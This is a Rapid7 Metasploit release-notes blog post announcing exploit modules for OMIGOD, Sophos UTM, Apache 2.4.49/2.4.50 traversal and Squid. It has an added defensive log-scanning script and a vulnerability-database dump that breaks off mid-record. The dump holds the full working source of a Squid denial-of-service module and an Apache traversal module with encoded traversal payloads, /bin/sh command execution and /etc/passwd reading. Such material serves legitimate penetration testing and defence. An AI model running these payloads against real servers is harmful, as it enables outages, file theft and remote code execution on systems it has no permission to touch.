# Metasploit Wrap-Up
## OMIGOD It's RCE

We are excited to announce that we now have a module for the OMIGOD vulnerability that exploits [CVE-2021-38647](<https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647?referrer=blog>) courtesy of our very own Spencer McIntyre! Successful exploitation will allow an unauthenticated attacker to gain `root` level code execution against affected servers. Given that this has seen exploitation in the wild by the Mirai botnet, we hope you're patched, lest your servers decide to join the zombie horde this Halloween!
## Sophos Contributes to the RCE Pile
Continuing the trend of unauthenticated RCE exploits that grant `root` level code execution, this week we also have an exploit for [CVE-2020-25223](<https://attackerkb.com/topics/rOhVHstwNO/cve-2020-25223?referrer=blog>), an unauthenticated RCE within the Sophos UTM WebAdmin service. Whilst we haven't yet seen this bug exploited in the wild, it is definitely one to patch given its severity. Stay frosty folks!
## Guess Who’s Back, Back Again, Apache's Back, Tell a Friend
Whilst not a marshalling bug (I'm sorry, it's Halloween; some puns are needed), community contributors Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien) have added a scanner and exploit for [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=blog>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>), based on work from [RootUp](<https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse>), [ProjectDiscovery](<https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml>), and [HackerFantastic](<https://twitter.com/hackerfantastic/status/1445531829985968137>). Path traversal vulnerabilities are relatively easy to exploit, and this one got a lot of attention in the news since it has been a long time since Apache has seen a reliable RCE exploit against it. This is definitely one to patch if you're running any Apache servers. Successful exploitation results in remote code execution as the user running the Apache server.
## New module content (6)
* [Squid Proxy Range Header DoS](<https://github.com/rapid7/metasploit-framework/pull/15756>) by Joshua Rogers, which exploits [CVE-2021-31806](<https://attackerkb.com/topics/2k0UqRcdTC/cve-2021-31806?referrer=search>) and [CVE-2021-31807](<https://attackerkb.com/topics/xIwbe92O2s/cve-2021-31807?referrer=blog>) - This adds a module that leverages CVE-2021-31806 and CVE-2021-31807 to trigger a denial of service condition in vulnerable Squid proxy servers.
* [Apache 2.4.49/2.4.50 Traversal RCE scanner](<https://github.com/rapid7/metasploit-framework/pull/15754>) by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), which exploits [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=search>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>) - This adds both a scanner and an exploit module for the two recent path traversal vulnerabilities in the Apache HTTP Server (apache2). The RCE module requires `mod_cgi` to be enabled but can be exploited remotely without any authentication.
* [Sophos UTM WebAdmin SID Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15783>) by wvu and Justin Kennedy, which exploits [CVE-2020-25223](<https://attackerkb.com/topics/rOhVHstwNO/cve-2020-25223?referrer=blog>) - This adds an exploit for CVE-2020-25223, an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation results in OS command execution as the `root` user.
* [Microsoft OMI Management Interface Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/15800>) by wvu, Nir Ohfeld, Shir Tamari, and Spencer McIntyre, which exploits [CVE-2021-38647](<https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647?referrer=blog>) - We added an unauthenticated RCE exploit for Microsoft OMI "OMIGOD" CVE-2021-38647. Successful exploitation grants code execution as the `root` user.
* [Apache 2.4.49/2.4.50 Traversal RCE](<https://github.com/rapid7/metasploit-framework/pull/15754>) by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), which exploits [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=search>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>) - This adds both a scanner and an exploit module for the two recent path traversal vulnerabilities in the Apache HTTP Server (apache2). The RCE module requires `mod_cgi` to be enabled but can be exploited remotely without any authentication.
* [Browse the session filesystem in a Web Browser](<https://github.com/rapid7/metasploit-framework/pull/15558>) by timwr - This adds a post module that allows the user to view a Meterpreter session's filesystem via a locally hosted web page.
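Detection-side counterpart to the Apache traversal modules above, added here as an example and not part of the Metasploit modules or the original post: it scans Apache access-log lines for request paths that only reveal `..` segments after percent-decoding (the shape of CVE-2021-41773 in 2.4.49 and of the double-encoded CVE-2021-42013 bypass in 2.4.50) and separately marks requests aimed at `/cgi-bin/`, since the RCE variant needs `mod_cgi`. The log format and every sample line are assumptions constructed for the example.

```python
"""Flag Apache access-log requests that hide dot-segments behind URL encoding.

Added example, not Metasploit code. CVE-2021-41773 (httpd 2.4.49) abused
percent-encoded dots such as ".%2e/" to slip past path normalisation, and
CVE-2021-42013 (httpd 2.4.50) did the same with a second layer of encoding
("%%32%65"). Both only show ".." once the path is decoded, so the detector
decodes repeatedly and compares the result against the raw path.
"""
import re
from urllib.parse import unquote

# The request line is the first quoted field of Apache's combined log format.
_REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Oct/2021:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [29/Oct/2021:10:00:01 +0000] '
    '"GET /icons/.%2e/.%2e/.%2e/.%2e/etc/hostname HTTP/1.1" 200 64',
    '203.0.113.9 - - [29/Oct/2021:10:00:02 +0000] '
    '"POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/hostname HTTP/1.1" 200 64',
    '203.0.113.11 - - [29/Oct/2021:10:00:03 +0000] "GET /../etc/hostname HTTP/1.1" 400 0',
]


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded so it cannot loop)."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_request(target: str) -> dict:
    """Describe a request target before and after decoding.

    encoded_traversal is set only when ".." appears as a path segment after
    decoding but not in the raw path: a literal "/../" is normalised away by
    httpd, so the case worth flagging is the one that needed encoding to survive.
    """
    path = target.split("?", 1)[0]
    decoded = fully_decode(path)
    hidden_dotdot = ".." in decoded.split("/") and ".." not in path.split("/")
    return {
        "raw": path,
        "decoded": decoded,
        "encoded_traversal": hidden_dotdot,
        # mod_cgi is what turns the traversal into RCE, so note that target.
        "cgi_target": hidden_dotdot and path.lower().startswith("/cgi-bin/"),
    }


def scan_access_log(lines) -> list:
    """Return one finding per log line whose request is an encoded traversal."""
    findings = []
    for line in lines:
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        result = classify_request(match.group("target"))
        if result["encoded_traversal"]:
            result["method"] = match.group("method")
            result["client"] = line.split(" ", 1)[0]
            findings.append(result)
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        flavour = "cgi-bin (RCE-capable)" if hit["cgi_target"] else "file read"
        print(f'{hit["client"]} {hit["method"]} {hit["raw"]} -> {hit["decoded"]} [{flavour}]')
```

Run against SAMPLE_LOG it reports the two encoded requests and ignores both the benign request and the literal `/../` request that httpd already rejects.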
## Enhancements and features
* [#15681](<https://github.com/rapid7/metasploit-framework/pull/15681>) from [smashery](<https://github.com/smashery>) - This adds support for reverse port forwarding via established SSH sessions.
* [#15778](<https://github.com/rapid7/metasploit-framework/pull/15778>) from [k0pak4](<https://github.com/k0pak4>) - This PR adds documentation for the HTTP TRACE scanner.
* [#15788](<https://github.com/rapid7/metasploit-framework/pull/15788>) from [zeroSteiner](<https://github.com/zeroSteiner>) - When a generated PowerShell command payload would exceed the maximum length that can successfully execute, gracefully fall back to omitting the AMSI bypass.
* [#15803](<https://github.com/rapid7/metasploit-framework/pull/15803>) from [k0pak4](<https://github.com/k0pak4>) - This adds documentation for the `f5_bigip_virtual_server` scanner.
## Bugs fixed
* [#15799](<https://github.com/rapid7/metasploit-framework/pull/15799>) from [adfoster-r7](<https://github.com/adfoster-r7>) - This fixes a crash in the `iis_internal_ip` module.
## Get it
As always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:
* [Pull Requests 6.1.11...6.1.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-21T11%3A22%3A54-04%3A00..2021-10-28T08%3A17%3A18-05%3A00%22>)
* [Full diff 6.1.11...6.1.12](<https://github.com/rapid7/metasploit-framework/compare/6.1.11...6.1.12>)
If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest version of Metasploit Framework. To install fresh without using `git`, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).
Posted by Grant Willcox on 2021-10-29 at <https://blog.rapid7.com/2021/10/29/metasploit-wrap-up-136/>.
{"ubuntucve": [{"lastseen": "2022-10-26T13:33:47", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An\ninteger overflow problem allows a remote server to achieve Denial of\nService when delivering responses to HTTP Range requests. The issue trigger\nis a header that can be expected to exist in HTTP traffic without any\nmalicious intent.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989043>\n * <https://bugzilla.suse.com/show_bug.cgi?id=1185916>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | same commit as CVE-2021-31806\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-28T00:00:00", "type": "ubuntucve", "title": "CVE-2021-31807", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806", "CVE-2021-31807"], "modified": "2021-05-28T00:00:00", "id": "UB:CVE-2021-31807", "href": "https://ubuntu.com/security/CVE-2021-31807", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T13:15:19", "description": "A flaw was found in a change made to path normalization in 
Apache HTTP\nServer 2.4.49. An attacker could use a path traversal attack to map URLs to\nfiles outside the directories configured by Alias-like directives. If files\noutside of these directories are not protected by the usual default\nconfiguration \"require all denied\", these requests can succeed. If CGI\nscripts are also enabled for these aliased pathes, this could allow for\nremote code execution. This issue is known to be exploited in the wild.\nThis issue only affects Apache 2.4.49 and not earlier versions. The fix in\nApache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "ubuntucve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-05T00:00:00", "id": "UB:CVE-2021-41773", "href": "https://ubuntu.com/security/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:15:14", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50\nwas 
insufficient. An attacker could use a path traversal attack to map URLs\nto files outside the directories configured by Alias-like directives. If\nfiles outside of these directories are not protected by the usual default\nconfiguration \"require all denied\", these requests can succeed. If CGI\nscripts are also enabled for these aliased pathes, this could allow for\nremote code execution. This issue only affects Apache 2.4.49 and Apache\n2.4.50 and not earlier versions.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Ubuntu wasn't vulnerable to CVE-2021-41773 so we did not deploy the insufficient fix.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "ubuntucve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "UB:CVE-2021-42013", "href": "https://ubuntu.com/security/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T13:33:55", "description": "An issue was discovered 
in Squid before 4.15 and 5.x before 5.0.6. Due to a\nmemory-management bug, it is vulnerable to a Denial of Service attack\n(against all clients using the proxy) via HTTP Range request processing.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989043>\n * <https://bugzilla.suse.com/show_bug.cgi?id=1185916>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-27T00:00:00", "type": "ubuntucve", "title": "CVE-2021-31806", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806"], "modified": "2021-05-27T00:00:00", "id": "UB:CVE-2021-31806", "href": "https://ubuntu.com/security/CVE-2021-31806", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2022-11-01T15:53:47", "description": "The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and 5.0.1-5.0.5 suffers from multiple vulnerabilities triggered by specific HTTP requests and responses. 
These vulnerabilities allow remote attackers to cause a denial of service through specifically crafted requests.\n", "cvss3": {}, "published": "2021-10-07T11:29:56", "type": "metasploit", "title": "Squid Proxy Range Header DoS", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-31806", "CVE-2021-31807"], "modified": "2021-10-21T17:15:30", "id": "MSF:AUXILIARY-DOS-HTTP-SQUID_RANGE_DOS-", "href": "https://www.rapid7.com/db/modules/auxiliary/dos/http/squid_range_dos/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Squid Proxy Range Header DoS',\n 'Description' => %q{\n The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and\n 5.0.1-5.0.5 suffers from multiple vulnerabilities triggered\n by specific HTTP requests and responses.\n\n These vulnerabilities allow remote attackers to cause a\n denial of service through specifically crafted requests.\n },\n 'Author' => [\n 'Joshua Rogers' # Discoverer, and Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['DOS', { 'Description' => 'Perform Denial of Service Against The Target' }]\n ],\n 'DefaultAction' => 'DOS',\n 'References' => [\n [ 'CVE', '2021-31806'],\n [ 'CVE', '2021-31807'],\n [ 'URL', 'https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/']\n ],\n 'DisclosureDate' => '2021-05-27',\n 'Notes' => {\n 'Stability' => [ CRASH_SERVICE_DOWN ],\n 'Reliability' => [ ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(3128),\n OptInt.new('REQUEST_COUNT', [ true, 'The number of requests to be sent, as well as the number of re-tries to confirm a dead host', 50 ]),\n OptEnum.new('CVE', [\n 
true, 'CVE to check/exploit', 'CVE-2021-31806',\n ['CVE-2021-31806', 'CVE-2021-31807']\n ]),\n ]\n )\n end\n\n def on_request_uri(cli, _request)\n # The Last-Modified response header must be set such that Squid caches the page.\n send_response(cli, '<html></html>', { 'Last-Modified' => 'Mon, 01 Jan 2020 00:00:00 GMT' })\n end\n\n def run\n count = 0\n error_count = 0 # The amount of connection errors from the server.\n reqs = datastore['REQUEST_COUNT'] # The maximum amount of requests (with a valid response) to the server.\n\n print_status(\"Sending #{reqs} DoS requests to #{peer}\")\n\n start_service\n\n while reqs > count\n begin\n res = req(datastore['CVE'])\n rescue Errno::ECONNRESET\n res = nil\n end\n\n if res && (res.code == 200) && (count == 0)\n count = 1\n print_status(\"Sent first request to #{rhost}:#{rport}\")\n elsif res\n print_status(\"Sent DoS request #{count} to #{rhost}:#{rport}\")\n count += 1\n error_count = 0\n\n next # Host could be completely dead, or just waiting for another Squid child.\n elsif count == 0\n print_error('Cannot connect to host.')\n return\n end\n\n error_count += 1\n next unless error_count > reqs # If we cannot connect after `res` amount of attempts, assume the DoS was successful.\n\n print_good('DoS completely successful.')\n report_vuln(\n host: rhost,\n port: rport,\n name: name,\n refs: references\n )\n return\n end\n print_error('Looks like the host is not vulnerable.')\n end\n\n def req(cve)\n case cve\n when 'CVE-2021-31806'\n sploit = cve_2021_31806\n when 'CVE-2021-31807'\n sploit = cve_2021_31807\n end\n\n send_request_raw({\n 'uri' => get_uri,\n 'headers' => {\n 'Host' => \"#{srvhost_addr}:#{srvport}\",\n 'Range' => sploit,\n 'Cache-Control' => 'public'\n }\n })\n end\n\n def cve_2021_31806\n # This will cause Squid to assert with \"http->out.offset <= start\"\n %(bytes=0-0,-0,-1)\n end\n\n def cve_2021_31807\n # This will cause Squid to assert with \"!http->range_iter.debt() == 
!http->range_iter.currentSpec()\"\n %(bytes=0-0,-4,-0)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/squid_range_dos.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-01T10:46:09", "description": "This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T17:00:59", "type": "metasploit", "title": "Apache 2.4.49/2.4.50 Traversal RCE scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-22T16:38:03", "id": "MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_normalize_path/", "sourceData": 
"##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE scanner',\n 'Description' => %q{\n This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n },\n 'Actions' => [\n [\n 'CHECK_TRAVERSAL',\n {\n 'Description' => 'Check for vulnerability.'\n }\n ],\n [\n 
'CHECK_RCE',\n {\n 'Description' => 'Check for RCE (if mod_cgi is enabled).'\n }\n ],\n [\n 'READ_FILE',\n {\n 'Description' => 'Read file on the remote server.'\n }\n ]\n ],\n 'DefaultAction' => 'CHECK_TRAVERSAL'\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('FILEPATH', [false, 'File you want to read', '/etc/passwd']),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def exec_traversal(cmd)\n send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => normalize_uri(datastore['TARGETURI'], @traversal.to_s),\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{cmd}\"\n })\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def read_traversal\n send_request_raw({\n 'method' => 'GET',\n 'uri' => normalize_uri(@target_uri, @traversal.to_s)\n })\n end\n\n def run_host(ip)\n @proto = (ssl ? 
'https' : 'http')\n\n case action.name\n when 'CHECK_TRAVERSAL'\n @target_uri = datastore['TARGETURI']\n @traversal = pick_payload * datastore['DEPTH'] << '/etc/passwd'\n\n response = read_traversal\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if response.code == 200 && response.body.include?('root:x:0:0:')\n print_good(message(\"The target is vulnerable to #{datastore['CVE']}.\"))\n\n vprint_status(\"Obtained HTTP response code #{response.code}.\")\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n print_error(message(\"The target is not vulnerable to #{datastore['CVE']}.\"))\n\n return Exploit::CheckCode::Safe\n when 'CHECK_RCE'\n @traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n rand_str = Rex::Text.rand_text_alpha(4..8)\n\n response = exec_traversal(\"echo #{rand_str}\")\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if response.code == 200 && response.body.include?(rand_str)\n print_good(message(\"The target is vulnerable to #{datastore['CVE']} (mod_cgi is enabled).\"))\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n print_error(message(\"The target is not vulnerable to #{datastore['CVE']} (requires mod_cgi to be enabled).\"))\n\n return Exploit::CheckCode::Safe\n when 'READ_FILE'\n fail_with(Failure::BadConfig, 'File path option is empty!') if !datastore['FILEPATH'] || datastore['FILEPATH'].empty?\n\n @target_uri = datastore['TARGETURI']\n @traversal = pick_payload * datastore['DEPTH'] << datastore['FILEPATH']\n\n response = read_traversal\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n vprint_status(\"Obtained HTTP response code #{response.code}.\")\n if response.code == 
500\n print_warning(message(\"The target is vulnerable to #{datastore['CVE']} (mod_cgi is enabled).\"))\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n end\n\n if response.code == 500 || response.body.empty?\n print_error('Nothing was downloaded')\n\n return Exploit::CheckCode::Vulnerable if response.code == 500\n end\n\n if response.code == 200\n vprint_good(\"#{peer} \\n#{response.body}\")\n path = store_loot(\n 'apache.traversal',\n 'application/octet-stream',\n ip,\n response.body,\n datastore['FILEPATH']\n )\n print_good(\"File saved in: #{path}\")\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/apache_normalize_path.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T10:41:58", "description": "This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). 
